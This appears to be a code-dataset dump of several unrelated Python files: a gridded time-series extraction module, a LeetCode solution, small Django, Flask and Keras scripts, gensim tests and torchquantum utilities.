return pd.DataFrame(results)
def multipoint(self,
*coords: list,
labels: list = None, ) -> pd.DataFrame:
"""
Extracts a time series at many points for a given series of coordinate values. Each point should have the same
time coordinate and different coordinates for each other dimension.
Args:
coords (int or float or None): a list of coordinate tuples or a 2D numpy array. Each coordinate pair in
the list should provide a coordinate value (integer or float) for each dimension of the array, e.g.
len(coordinate_pair) == len(dim_order). See TimeSeries.point for more explanation.
labels (list): an optional list of strings which label each of the coordinates provided. len(labels) should
be equal to len(coords)
Returns:
pandas.DataFrame with an index, a column named datetime, and a column named values.
"""
assert len(self.dim_order) == len(coords[0]), 'Specify 1 coordinate for each dimension of the array'
if labels is None:
labels = [f'point{i}' for i in range(len(coords))]
assert len(labels) == len(coords), 'You must provide a label for each point or use auto numbering'
datalabels = []
for label in labels:
for var in self.variables:
datalabels.append(f'{var}_{label}')
# make the return item
results = dict(datetime=[])
for datalabel in datalabels:
results[datalabel] = []
# map coordinates -> cell indices -> python slice() objects
slices = self._gen_dim_slices(coords, 'multipoint')
# iterate over each file extracting the value and time for each
for file in self.files:
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (coords[0], coords[0]))
results['datetime'] += list(tsteps)
for var in self.variables:
for i, slc in enumerate(slices):
slc[self.t_index] = tslices if self.t_var_in_dims else slc[self.t_index]
# extract the appropriate values from the variable
vs = _array_by_eng(opened_file, var, tuple(slc))
if vs.ndim == 0:
if vs == self.fill_value:
vs = np.nan
results[f'{var}_{labels[i]}'].append(vs)
elif vs.ndim == 1:
vs[vs == self.fill_value] = np.nan
for v in vs:
results[f'{var}_{labels[i]}'].append(v)
else:
raise ValueError('There are too many dimensions after slicing')
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def bound(self,
min_coords: tuple,
max_coords: tuple,
stats: str or tuple = None, ) -> pd.DataFrame:
"""
Args:
min_coords (tuple): a tuple containing minimum coordinates of a bounding box range- coordinates given
in order of the dimensions of the source arrays.
max_coords (tuple): a tuple containing maximum coordinates of a bounding box range- coordinates given
in order of the dimensions of the source arrays.
stats (str or tuple): How to reduce arrays of values to a single value for the series. See class docstring.
Returns:
pandas.DataFrame with an index, a datetime column, and a column named for each statistic specified
"""
assert len(self.dim_order) == len(min_coords) == len(max_coords), \
'Specify 1 min and 1 max coordinate for each dimension'
# handle the optional arguments
self.stats = _gen_stat_list(stats) if stats is not None else self.stats
# make the return item
results = dict(datetime=[])
# add a list for each stat requested
for var in self.variables:
for stat in self.stats:
results[f'{var}_{stat}'] = []
# map coordinates -> cell indices -> python slice() objects
slices = self._gen_dim_slices((min_coords, max_coords), 'range')
# iterate over each file extracting the value and time for each
for file in self.files:
# open the file
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (min_coords, max_coords))
results['datetime'] += list(tsteps)
slices[self.t_index] = tslices if self.t_var_in_dims else slices[self.t_index]
for var in self.variables:
# slice the variable's array, returns array with shape corresponding to dimension order and size
vs = _array_by_eng(opened_file, var, tuple(slices))
vs[vs == self.fill_value] = np.nan
for stat in self.stats:
results[f'{var}_{stat}'] += _array_to_stat_list(vs, stat)
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def range(self,
min_coordinates: tuple,
max_coordinates: tuple,
stats: str or tuple = None, ) -> pd.DataFrame:
"""
Alias for TimeSeries.bound(). Refer to documentation for the bound method.
"""
return self.bound(min_coordinates, max_coordinates, stats)
def shape(self,
mask: str or np.ndarray,
time_range: tuple = (None, None),
behavior: str = 'dissolve',
label_attr: str = None,
feature: str = None,
stats: str or tuple = None, ) -> pd.DataFrame:
"""
Applicable only to source data with exactly 2 spatial dimensions, x and y, and a time dimension.
Args:
mask (str): path to any spatial polygon file, e.g. shapefile or geojson, which can be read by gpd.
time_range: a tuple of the min and max time range to query a time series for
            behavior (str): determines how the vector data is used to mask the arrays. Options are:
                dissolve, feature, features
                - dissolve: treats all features as if they were 1 feature and masks the entire set of polygons in 1 grid
                - feature: uses only the features whose label_attr value matches the feature argument, masked as one entity
                - features: treats each feature as a separate entity, must specify an attribute shared by each feature
                  with unique values for each feature used to label the resulting series
label_attr: The name of the attribute in the vector data features to label the several outputs
feature: A value of the label_attr attribute for 1 or more features found in the provided shapefile
stats (str or tuple): How to reduce arrays of values to a single value for the series. See class docstring.
Returns:
pandas.DataFrame with an index, a datetime column, and a column named for each statistic specified
"""
if not len(self.dim_order) == 3:
raise RuntimeError('You can only extract by polygon if the data is exactly 3 dimensional: time, y, x')
# cache the behavior and organization parameters
self.stats = _gen_stat_list(stats) if stats is not None else self.stats
if isinstance(mask, str):
masks = self._create_spatial_mask_array(mask, behavior, label_attr, feature)
elif isinstance(mask, np.ndarray):
masks = ['masked', mask]
else:
raise ValueError('Unusable data provided for the "mask" argument')
# make the return item
results = dict(datetime=[])
for mask in masks:
for stat in self.stats:
for var in self.variables:
results[f'{var}_{mask[0]}_{stat}'] = []
# slice data on all dimensions
slices = [slice(None), ] * len(self.dim_order)
# iterate over each file extracting the value and time for each
for file in self.files:
# open the file
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (time_range[0], time_range[1]))
results['datetime'] += list(tsteps)
slices[self.t_index] = tslices if self.t_var_in_dims else slices[self.t_index]
num_time_steps = len(tsteps)
for var in self.variables:
# slice the variable's array, returns array with shape corresponding to dimension order and size
for i in range(num_time_steps):
slices[self.t_index] = slice(i, i + 1)
vals = _array_by_eng(opened_file, var, tuple(slices))
for mask in masks:
masked_vals = np.where(mask[1], vals, np.nan).squeeze()
masked_vals[masked_vals == self.fill_value] = np.nan
for stat in self.stats:
results[f'{var}_{mask[0]}_{stat}'] += _array_to_stat_list(masked_vals, stat)
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def _gen_dim_slices(self,
coords: tuple,
slice_style: str):
if self.engine == 'pygrib':
revert_engine = self.engine
self.engine = 'cfgrib'
else:
revert_engine = False
slices = []
tmp_file = self._open_data(self.files[0])
if slice_style in ('point', 'range'):
for index, dim in enumerate(self.dim_order):
if dim == self.t_var:
slices.append(None)
continue
vals = _array_by_eng(tmp_file, dim)
if slice_style == 'point':
slices.append(_map_coords_to_slice(vals, coords[index], coords[index], dim))
else:
slices.append(_map_coords_to_slice(vals, coords[0][index], coords[1][index], dim))
elif slice_style == 'multipoint':
for index, dim in enumerate(self.dim_order):
if dim == self.t_var:
slices.append([None, ] * len(coords))
continue
vals = _array_by_eng(tmp_file, dim)
dim_slices = []
for coord in coords:
dim_slices.append(_map_coords_to_slice(vals, coord[index], coord[index], dim))
slices.append(dim_slices)
slices = np.transpose(slices)
else:
raise RuntimeError("Slice behavior not implemented")
if revert_engine:
self.engine = revert_engine
return slices
def _create_spatial_mask_array(self, vector: str, behavior: str, label_attr: str, feature: str) -> np.ma:
if self.x_var is None or self.y_var is None:
raise ValueError('Unable to determine x and y dimensions')
sample_data = self._open_data(self.files[0])
x = _array_by_eng(sample_data, self.x_var)
y = _array_by_eng(sample_data, self.y_var)
if self.engine != 'pygrib':
sample_data.close()
# catch the case when people use improper 2d instead of proper 1d coordinate dimensions
if x.ndim == 2:
x = x[0, :]
if y.ndim == 2:
y = y[:, 0]
# check if you need to vertically invert the array mask (if y vals go from small to large)
# or if you need to transpose the mask (if the dimensions go x then y, should be y then x- think of the shape)
invert = y[-1] > y[0]
transpose = self.dim_order.index(self.x_var) < self.dim_order.index(self.y_var)
# read the shapefile
vector_gdf = gpd.read_file(vector)
# set up the variables to create and storing masks
masks = []
# what is the shape of the grid to be masked
gshape = (y.shape[0], x.shape[0],)
# calculate the affine transformation of the grid to be masked
aff = affine.Affine(np.abs(x[1] - x[0]), 0, x.min(), 0, np.abs(y[1] - y[0]), y.min())
# creates a binary/boolean mask of the shapefile
# in the same crs, over the affine transform area, for a certain masking behavior
if behavior == 'dissolve':
m = riof.geometry_mask(vector_gdf.geometry, gshape, aff, invert=invert)
if transpose:
m = np.transpose(m)
masks.append(('shape', m))
elif behavior == 'feature':
assert label_attr in vector_gdf.keys(), \
'label_attr parameter not found in attributes list of the vector data'
assert feature is not None, \
'Provide a value for the feature argument to query for certain features'
vector_gdf = vector_gdf[vector_gdf[label_attr] == feature]
assert not vector_gdf.empty, f'No features have value "{feature}" for attribute "{label_attr}"'
m = riof.geometry_mask(vector_gdf.geometry, gshape, aff, invert=invert)
if transpose:
m = np.transpose(m)
masks.append((feature, m))
elif behavior == 'features':
assert label_attr in vector_gdf.keys(), \
'label_attr parameter not found in attributes list of the vector data'
for idx, row in vector_gdf.iterrows():
m = riof.geometry_mask(gpd.GeoSeries(row.geometry), gshape, aff, invert=invert)
if transpose:
m = np.transpose(m)
masks.append((row[label_attr], m))
return masks
def _handle_time(self, opened_file, file_path: str, time_range: tuple) -> tuple:
if self.strp_filename: # strip the datetime from the file name
tvals = [datetime.datetime.strptime(os.path.basename(file_path), self.strp_filename), ]
elif self.engine == 'pygrib':
tvals = [opened_file[self.variables].validDate, ]
else:
tvals = _array_by_eng(opened_file, self.t_var)
if isinstance(tvals, np.datetime64):
tvals = [tvals]
if tvals.ndim == 0:
...
else:
tvals = [t for t in tvals]
# convert the time variable array's numbers to datetime representations
if self.interp_units:
if self.engine == 'xarray':
...
elif self.unit_str is None:
tvals = _delta_to_time(tvals, _attr_by_eng(opened_file, self.t_var, 'units'), self.origin_format)
else:
tvals = _delta_to_time(tvals, self.unit_str, self.origin_format)
tvals = np.array(tvals)
# if the variable depends on time then there should be a coordinate provided for it
if self.t_var_in_dims:
t1 = time_range[0]
t2 = time_range[1]
if isinstance(t1, list) or isinstance(t1, tuple):
t1 = t1[self.t_index]
if isinstance(t2, list) or isinstance(t2, tuple):
t2 = t2[self.t_index]
# otherwise, no time coordinates provided.
else:
t1 = None
t2 = None
time_slices = _map_coords_to_slice(tvals, t1, t2, 'time')
return tvals[(time_slices,)], time_slices
def _open_data(self, path):
if self.engine == 'xarray':
return xr.open_dataset(path, backend_kwargs=self.xr_kwargs)
elif self.engine == 'opendap':
try:
if self.session:
return xr.open_dataset(xr.backends.PydapDataStore.open(path, session=self.session))
else:
return xr.open_dataset(path)
except ConnectionRefusedError as e:
raise e
except Exception as e:
print('Unexpected Error')
raise e
elif self.engine == 'auth-opendap':
return xr.open_dataset(xr.backends.PydapDataStore.open(
path, session=setup_session(self.user, self.pswd, check_url=path)))
elif self.engine == 'netcdf4':
return nc.Dataset(path, 'r')
elif self.engine == 'cfgrib':
return xr.open_dataset(path, engine='cfgrib', backend_kwargs=self.xr_kwargs)
elif self.engine == 'pygrib':
a = pygrib.open(path)
return a.read()
elif self.engine == 'h5py':
return h5py.File(path, 'r')
elif self.engine == 'rasterio':
return xr.open_rasterio(path)
else:
raise ValueError(f'Unable to open file, unsupported engine: {self.engine}')
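# -------------------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The file paths, variable
# name and coordinates below are hypothetical; they only show how the methods documented
# in the class docstring fit together.
#
#   series = TimeSeries(
#       files=['/path/to/forecast_day1.nc', '/path/to/forecast_day2.nc'],
#       var='air_temperature',
#       dim_order=('time', 'lat', 'lon'),
#       interp_units=True,
#       stats=('mean', 'max'),
#   )
#   point_df = series.point(None, 40.0, -111.0)   # None -> keep every time step
#   box_df = series.bound((None, 35.0, -115.0), (None, 45.0, -105.0))
#   shape_df = series.shape('/path/to/watershed.geojson', behavior='dissolve')
# -------------------------------------------------------------------------------------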
| StarcoderdataPython |
42171 | # Problem Statement: https://leetcode.com/problems/climbing-stairs/
class Solution:
def climbStairs(self, n: int) -> int:
# Base Cases
if n==1:
return 1
if n==2:
return 2
# Memoization
memo_table = [1]*(n+1)
# Initialization
memo_table[1] = 1
memo_table[2] = 2
# Iterative solution Memoization
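        # memo_table[i] counts the distinct ways to reach step i: the last move is either
        # 1 step from i-1 or 2 steps from i-2, so the two counts add (a Fibonacci-style recurrence).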
for i in range(3, n+1):
memo_table[i] = memo_table[i-1]+memo_table[i-2]
        return memo_table[n]
| StarcoderdataPython |
3255522 | from tmeister import cron
if __name__ == '__main__':
cron.run()
| StarcoderdataPython |
1689145 | <filename>Week3/02_Execucao-Condicional/Desafio_bhaskara.py
import math
a = float(input("Digite o valor de a: "))
b = float(input("Digite o valor de b: "))
c = float(input("Digite o valor de c: "))
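# Quadratic (Bhaskara) formula: x = (-b +/- sqrt(b^2 - 4*a*c)) / (2*a); delta below is the discriminant.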
delta = (b ** 2) - (4 * a * c)
print(delta)
if (delta == 0):
    x = (-b + math.sqrt(delta)) / (2 * a)
print("A única raiz é:",x)
else:
if (delta < 0):
print("Esta equação não possui raizes reais!")
else:
        x1 = (-b - math.sqrt(delta)) / (2 * a)
        x2 = (-b + math.sqrt(delta)) / (2 * a)
print("A primeira raiz é: %d!\nA segunda raiz é: %d!" %(x1,x2)) | StarcoderdataPython |
168033 | from django.contrib import admin
from .models import Class, Studio
# Register your models here.
admin.site.register(Class)
admin.site.register(Studio)
| StarcoderdataPython |
164871 | <filename>src/utils/FastClassAI_cnn_models.py<gh_stars>1-10
# ********************************************************************************** #
# #
# Project: FastClassAI workbecnch #
#                   Project: FastClassAI workbench                                  #
# Author: <NAME> #
# Contact: <EMAIL> #
# #
# This notebook is a part of Skin AanaliticAI development kit, created #
# for evaluation of public datasets used for skin cancer detection with #
# large number of AI models and data preparation pipelines. #
# #
# License: MIT #
# Copyright (C) 2021.01.30 <NAME> #
# https://opensource.org/licenses/MIT #
# #
# ********************************************************************************** #
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os # allow changing, and navigating files and folders,
import sys
import re # module to use regular expressions,
import glob # lists names in folders that match Unix shell patterns
import random # functions that use and generate random numbers
import numpy as np # support for multi-dimensional arrays and matrices
import pandas as pd # library for data manipulation and analysis
import seaborn as sns # advance plots, for statistics,
import matplotlib.pyplot as plt # for making plots,
import matplotlib as mpl # to get some basif functions, heping with plot mnaking
import tensorflow as tf
import tensorflow_hub as hub
import scipy.stats as stats # library for statistics and technical programming,
import tensorflow.keras as keras
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import ParameterGrid
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier # accepts only numerical data
from sklearn.tree import export_graphviz
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras import backend as K # used for housekeeping of tf models,
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from sklearn.decomposition import PCA
from tensorflow.keras import backend as K
from tensorflow.keras import Sequential
from tensorflow.keras import activations
from tensorflow.keras import initializers
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Dropout
from tensorflow.keras import optimizers
from tensorflow.keras import losses
from tensorflow.keras import metrics
from tensorflow.keras import Sequential, activations, initializers
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
# Function, ...........................................................................
def TwoConv_OneNN_model(*, input_size, output_size, params=dict(), verbose=False):
'''
    Creates a simple sequential CNN model: two convolutional layers followed by one
    fully connected hidden layer and a softmax output layer.
    input_size : tuple, shape of one input image, e.g. (height, width, channels)
    output_size : int, number of output classes
    params : dict with selected parameters and options used for model creation
    verbose : bool, if True, print the model summary
'''
# default params,
    params.setdefault("f1_units", 100)
    params.setdefault("f1_dropout", 0)
    params.setdefault("optimizer", "Adam")
    params.setdefault("early_strop", None)  # key name kept as used below
# Convolutional Network
model = keras.Sequential()
#.. 1st cnn, layer
model.add(keras.layers.Conv2D(
filters=64,
kernel_size=5,
strides=2,
activation='relu',
input_shape=input_size
))
#.. maxpool 1.
model.add(keras.layers.MaxPool2D(pool_size=2))
#.. 2nd cnn layer,
model.add(keras.layers.Conv2D(
filters=64,
kernel_size=3,
strides=1,
activation='relu'
))
#.. maxpool 2,
model.add(keras.layers.MaxPool2D(pool_size=2))
#.. flat the results,
model.add(keras.layers.Flatten())
#.. hidden layer
model.add(Dense(
units=params["f1_units"],
activation="relu",
#kernel_regularizer=tf.keras.regularizers.l2(0.001),
kernel_initializer=initializers.TruncatedNormal(mean=0.0, stddev=0.01, seed=0)
))
model.add(tf.keras.layers.Dropout(params["f1_dropout"]))
#.. output nn,
model.add(keras.layers.Dense(
units=output_size,
activation='softmax'
))
# compile,
model.compile(optimizer=params["optimizer"], loss='categorical_crossentropy', metrics=['acc'])
if verbose==True:
model.summary()
else:
pass
# create callback function,
if params['early_strop'] is not None:
callback_function = keras.callbacks.EarlyStopping(monitor='val_loss', patience=params["early_strop"])
return model, [callback_function]
else:
return model, None
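# Illustrative usage sketch (not part of the original module): builds and compiles the
# network above for hypothetical 28x28 grayscale images and 10 classes. The parameter
# keys match the ones handled inside TwoConv_OneNN_model; no training data is involved.
if __name__ == "__main__":
    example_params = {
        "f1_units": 128,
        "f1_dropout": 0.2,
        "optimizer": "Adam",
        "early_strop": 5,  # key name kept as used inside the function
    }
    example_model, example_callbacks = TwoConv_OneNN_model(
        input_size=(28, 28, 1),
        output_size=10,
        params=example_params,
        verbose=True,
    )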
| StarcoderdataPython |
47804 | # -*- coding: UTF-8 -*-
# https://dormousehole.readthedocs.io/en/latest/config.html#config
class Config(object):
SECRET_KEY = 'e9d37baf44de4b11a76159c50820468f'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_stock' # 股票数据库,默认
SQLALCHEMY_BINDS = {
'fund': 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_fund' # 基金数据库
}
CHROME_DRIVER = '/Users/xingweidong/envs/selenium/webdriver/chrome/88.0.4324.96/chromedriver'
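# Illustrative sketch (an assumption, not part of the original config): with
# Flask-SQLAlchemy, models stored in the fund database declare the bind key, while
# models without __bind_key__ use the default SQLALCHEMY_DATABASE_URI, e.g.
# (assuming db = SQLAlchemy(app) is set up elsewhere):
#
#   class Fund(db.Model):
#       __bind_key__ = 'fund'
#       id = db.Column(db.Integer, primary_key=True)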
| StarcoderdataPython |
3386905 | from src.config import MESSAGE_UNEXPECTED_ERROR
from src.helper import log
def make(error, message=None, response=None):
response_dict = dict(error=error)
if error:
assert isinstance(message, str)
response_dict['message'] = message
else:
assert isinstance(response, dict)
response_dict['response'] = response
return response_dict
def raise_exception(e):
log.error(f'Unexpected error: [{e}]')
log.exception(e)
return make(error=True, message=MESSAGE_UNEXPECTED_ERROR)
| StarcoderdataPython |
3316312 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: <NAME> <<EMAIL>>
# Copyright (C) 2017 <NAME> <<EMAIL>>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking the poincare module from the models package.
"""
import logging
import unittest
import numpy as np
from gensim.corpora import Dictionary
from gensim.models import KeyedVectors as EuclideanKeyedVectors
from gensim.test.utils import datapath
logger = logging.getLogger(__name__)
class TestEuclideanKeyedVectors(unittest.TestCase):
def setUp(self):
self.vectors = EuclideanKeyedVectors.load_word2vec_format(
datapath('euclidean_vectors.bin'), binary=True, datatype=np.float64)
def similarity_matrix(self):
"""Test similarity_matrix returns expected results."""
corpus = [["government", "denied", "holiday"], ["holiday", "slowing", "hollingworth"]]
dictionary = Dictionary(corpus)
corpus = [dictionary.doc2bow(document) for document in corpus]
# checking symmetry and the existence of ones on the diagonal
        similarity_matrix = self.vectors.similarity_matrix(dictionary).todense()
        self.assertTrue((similarity_matrix.T == similarity_matrix).all())
        self.assertTrue((np.diag(similarity_matrix) == similarity_matrix).all())
        # checking that thresholding works as expected
        similarity_matrix = self.vectors.similarity_matrix(dictionary, threshold=0.45).todense()
        self.assertEqual(18, np.sum(similarity_matrix == 0))
        # checking that exponent works as expected
        similarity_matrix = self.vectors.similarity_matrix(dictionary, exponent=1.0).todense()
        self.assertAlmostEqual(9.5788956, np.sum(similarity_matrix))
        # checking that nonzero_limit works as expected
        similarity_matrix = self.vectors.similarity_matrix(dictionary, nonzero_limit=4).todense()
        self.assertEqual(4, np.sum(similarity_matrix == 0))
        similarity_matrix = self.vectors.similarity_matrix(dictionary, nonzero_limit=3).todense()
        self.assertEqual(20, np.sum(similarity_matrix == 0))
def test_most_similar(self):
"""Test most_similar returns expected results."""
expected = [
'conflict',
'administration',
'terrorism',
'call',
'israel'
]
predicted = [result[0] for result in self.vectors.most_similar('war', topn=5)]
self.assertEqual(expected, predicted)
def test_most_similar_topn(self):
"""Test most_similar returns correct results when `topn` is specified."""
self.assertEqual(len(self.vectors.most_similar('war', topn=5)), 5)
self.assertEqual(len(self.vectors.most_similar('war', topn=10)), 10)
predicted = self.vectors.most_similar('war', topn=None)
self.assertEqual(len(predicted), len(self.vectors.vocab))
def test_most_similar_raises_keyerror(self):
"""Test most_similar raises KeyError when input is out of vocab."""
with self.assertRaises(KeyError):
self.vectors.most_similar('not_in_vocab')
def test_most_similar_restrict_vocab(self):
"""Test most_similar returns handles restrict_vocab correctly."""
expected = set(self.vectors.index2word[:5])
predicted = set(result[0] for result in self.vectors.most_similar('war', topn=5, restrict_vocab=5))
self.assertEqual(expected, predicted)
def test_most_similar_with_vector_input(self):
"""Test most_similar returns expected results with an input vector instead of an input word."""
expected = [
'war',
'conflict',
'administration',
'terrorism',
'call',
]
input_vector = self.vectors['war']
predicted = [result[0] for result in self.vectors.most_similar([input_vector], topn=5)]
self.assertEqual(expected, predicted)
def test_most_similar_to_given(self):
"""Test most_similar_to_given returns correct results."""
predicted = self.vectors.most_similar_to_given('war', ['terrorism', 'call', 'waging'])
self.assertEqual(predicted, 'terrorism')
def test_similar_by_word(self):
"""Test similar_by_word returns expected results."""
expected = [
'conflict',
'administration',
'terrorism',
'call',
'israel'
]
predicted = [result[0] for result in self.vectors.similar_by_word('war', topn=5)]
self.assertEqual(expected, predicted)
def test_similar_by_vector(self):
"""Test similar_by_word returns expected results."""
expected = [
'war',
'conflict',
'administration',
'terrorism',
'call',
]
input_vector = self.vectors['war']
predicted = [result[0] for result in self.vectors.similar_by_vector(input_vector, topn=5)]
self.assertEqual(expected, predicted)
def test_distance(self):
"""Test that distance returns expected values."""
self.assertTrue(np.allclose(self.vectors.distance('war', 'conflict'), 0.06694602))
self.assertEqual(self.vectors.distance('war', 'war'), 0)
def test_similarity(self):
"""Test similarity returns expected value for two words, and for identical words."""
self.assertTrue(np.allclose(self.vectors.similarity('war', 'war'), 1))
self.assertTrue(np.allclose(self.vectors.similarity('war', 'conflict'), 0.93305397))
def test_words_closer_than(self):
"""Test words_closer_than returns expected value for distinct and identical nodes."""
self.assertEqual(self.vectors.words_closer_than('war', 'war'), [])
expected = set(['conflict', 'administration'])
self.assertEqual(set(self.vectors.words_closer_than('war', 'terrorism')), expected)
def test_rank(self):
"""Test rank returns expected value for distinct and identical nodes."""
self.assertEqual(self.vectors.rank('war', 'war'), 1)
self.assertEqual(self.vectors.rank('war', 'terrorism'), 3)
def test_wv_property(self):
"""Test that the deprecated `wv` property returns `self`. To be removed in v4.0.0."""
self.assertTrue(self.vectors is self.vectors.wv)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG)
unittest.main()
| StarcoderdataPython |
3357116 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchquantum as tq
import copy
from torchquantum.macro import C_DTYPE
from torchpack.utils.logging import logger
from typing import List, Dict, Iterable
from torchpack.utils.config import Config
from qiskit.providers.aer.noise.device.parameters import gate_error_values
from qiskit import IBMQ
from qiskit.exceptions import QiskitError
def pauli_eigs(n) -> np.ndarray:
r"""Eigenvalues for :math:`A^{\o times n}`, where :math:`A` is
Pauli operator, or shares its eigenvalues.
As an example if n==2, then the eigenvalues of a tensor product consisting
of two matrices sharing the eigenvalues with Pauli matrices is returned.
Args:
n (int): the number of qubits the matrix acts on
Returns:
list: the eigenvalues of the specified observable
"""
if n == 1:
return np.array([1, -1])
return np.concatenate([pauli_eigs(n - 1), -pauli_eigs(n - 1)])
def diag(x):
# input tensor, output tensor with diagonal as the input
# manual implementation because torch.diag does not support autograd of
# complex number
diag_len = x.shape[-1]
x = x.unsqueeze(-1)
dims = list(x.shape)
x = torch.cat([x, torch.zeros(dims[:-1] + [diag_len]).to(x.device)],
dim=-1)
x = x.view(dims[:-2] + [diag_len * (diag_len + 1)])[..., :-diag_len]
x = x.view(dims[:-2] + [diag_len, diag_len])
return x
class Timer(object):
def __init__(self, device='gpu', name='', times=100):
self.device = device
self.name = name
self.times = times
if device == 'gpu':
self.start = torch.cuda.Event(enable_timing=True)
self.end = torch.cuda.Event(enable_timing=True)
def __enter__(self):
if self.device == 'gpu':
self.start.record()
def __exit__(self, exc_type, exc_value, tb):
if self.device == 'gpu':
self.end.record()
torch.cuda.synchronize()
print(f"Task: {self.name}: "
f"{self.start.elapsed_time(self.end) / self.times} ms")
def get_unitary_loss(model: nn.Module):
loss = 0
for name, params in model.named_parameters():
if 'TrainableUnitary' in name:
U = params
like_identity = U.matmul(U.conj().permute(0, 2, 1))
identity = torch.eye(U.shape[0], dtype=C_DTYPE,
device=U.device)
loss += F.mse_loss(torch.view_as_real(identity),
torch.view_as_real(like_identity))
return loss
def legalize_unitary(model: nn.Module):
with torch.no_grad():
for name, params in model.named_parameters():
if 'TrainableUnitary' in name:
U = params
U, Sigma, V = torch.svd(U)
params.data.copy_(U.matmul(V.conj().permute(0, 2, 1)))
def switch_little_big_endian_matrix(mat):
if len(mat.shape) % 2 == 1:
is_batch_matrix = True
bsz = mat.shape[0]
reshape = [bsz] + [2] * int(np.log2(mat[0].size))
else:
is_batch_matrix = False
reshape = [2] * int(np.log2(mat.size))
original_shape = mat.shape
mat = mat.reshape(reshape)
axes = list(range(len(mat.shape) // 2))
axes.reverse()
axes += [axis + len(mat.shape) // 2 for axis in axes]
if is_batch_matrix:
axes = [0] + [axis + 1 for axis in axes]
mat = np.transpose(mat, axes=axes).reshape(original_shape)
return mat
def switch_little_big_endian_state(state):
if len(state.shape) > 1:
is_batch_state = True
bsz = state.shape[0]
reshape = [bsz] + [2] * int(np.log2(state[0].size))
elif len(state.shape) == 1:
is_batch_state = False
reshape = [2] * int(np.log2(state.size))
else:
logger.exception(f"Dimension of statevector should be 1 or 2")
raise ValueError
original_shape = state.shape
state = state.reshape(reshape)
if is_batch_state:
axes = list(range(1, len(state.shape)))
axes.reverse()
axes = [0] + axes
else:
axes = list(range(len(state.shape)))
axes.reverse()
mat = np.transpose(state, axes=axes).reshape(original_shape)
return mat
def switch_little_big_endian_matrix_test():
logger.info(switch_little_big_endian_matrix(np.ones((16, 16))))
logger.info(switch_little_big_endian_matrix(np.ones((5, 16, 16))))
def switch_little_big_endian_state_test():
logger.info(switch_little_big_endian_state(np.ones((5, 16))))
logger.info(switch_little_big_endian_state(np.arange(8)))
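# Hedged usage sketch (added for illustration): switching endianness of a
# 3-qubit statevector reverses the bit order of each basis-state index, so
# np.arange(8) becomes [0, 4, 2, 6, 1, 5, 3, 7].
def switch_little_big_endian_state_example():
    out = switch_little_big_endian_state(np.arange(8))
    assert np.array_equal(out, np.array([0, 4, 2, 6, 1, 5, 3, 7]))
    return out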
def get_expectations_from_counts(counts, n_wires):
exps = []
if isinstance(counts, dict):
counts = [counts]
for count in counts:
ctr_one = [0] * n_wires
total_shots = 0
for k, v in count.items():
for wire in range(n_wires):
if k[wire] == '1':
ctr_one[wire] += v
total_shots += v
prob_one = np.array(ctr_one) / total_shots
exp = np.flip(-1 * prob_one + 1 * (1 - prob_one))
exps.append(exp)
res = np.stack(exps)
return res
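# Hedged usage sketch (added for illustration): with counts in which every
# wire reads '1' on half of the shots, the Z expectation is 0 on both wires;
# note the np.flip above, which reverses the wire order of the result.
def get_expectations_from_counts_example():
    counts = {'00': 500, '11': 500}
    exps = get_expectations_from_counts(counts, n_wires=2)
    assert np.allclose(exps, np.zeros((1, 2)))
    return exps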
def find_global_phase(mat1, mat2, threshold):
for i in range(mat1.shape[0]):
for j in range(mat1.shape[1]):
            # find a numerically stable global phase: both entries must be
            # well above the threshold before taking their ratio
            if np.abs(mat1[i][j]) > threshold and \
                    np.abs(mat2[i][j]) > threshold:
return mat2[i][j] / mat1[i][j]
return None
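# Hedged usage sketch (added for illustration): two matrices that differ only
# by a global phase exp(1j * pi / 4); the returned ratio recovers that phase.
def find_global_phase_example():
    mat1 = np.eye(2, dtype=complex)
    mat2 = np.exp(1j * np.pi / 4) * mat1
    phase = find_global_phase(mat1, mat2, threshold=0.5)
    assert np.isclose(phase, np.exp(1j * np.pi / 4))
    return phase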
def build_module_op_list(m: tq.QuantumModule, x=None) -> List:
"""
serialize all operations in the module and generate a list with
[{'name': RX, 'has_params': True, 'trainable': True, 'wires': [0],
n_wires: 1, 'params': [array([[0.01]])]}]
so that an identity module can be reconstructed
The module needs to have static support
"""
m.static_off()
m.static_on(wires_per_block=None)
m.is_graph_top = False
# forward to register all modules and parameters
if x is None:
m.forward(q_device=None)
else:
m.forward(q_device=None, x=x)
m.is_graph_top = True
m.graph.build_flat_module_list()
module_list = m.graph.flat_module_list
m.static_off()
op_list = []
for module in module_list:
if module.params is not None:
if module.params.shape[0] > 1:
# more than one param, so it is from classical input with
# batch mode
assert not module.has_params
params = None
else:
# has quantum params, batch has to be 1
params = module.params[0].data.cpu().numpy()
else:
params = None
op_list.append({
'name': module.name.lower(),
'has_params': module.has_params,
'trainable': module.trainable,
'wires': module.wires,
'n_wires': module.n_wires,
'params': params
})
return op_list
def build_module_from_op_list(op_list: List[Dict],
remove_ops=False,
thres=None) -> tq.QuantumModule:
logger.info(f"Building module from op_list...")
thres = 1e-5 if thres is None else thres
n_removed_ops = 0
